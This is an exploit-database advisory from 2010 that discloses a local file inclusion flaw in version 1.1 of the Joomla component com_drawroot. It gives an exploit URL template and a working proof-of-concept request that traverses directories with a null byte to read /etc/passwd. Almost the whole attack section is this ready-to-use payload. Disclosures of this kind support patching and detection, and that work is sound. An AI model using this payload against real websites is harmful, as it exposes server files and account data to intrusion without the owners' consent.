id: 11871
date: 04/18/2010
title: Joomla Component com_drawroot Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

================================================================
Joomla Component com_drawroot Local File Inclusion Vulnerability 
================================================================

==============================================================================================================
 
 
  [o] Joomla Component Contact Us Draw Root Map Local File Inclusion Vulnerability
  
       Software : com_drawroot version 1.1
       Vendor   : http://joomlacomponent.inetlanka.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
==============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_drawroot&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
 
 
==============================================================================================================



#  0day.today [2023-03-26]  #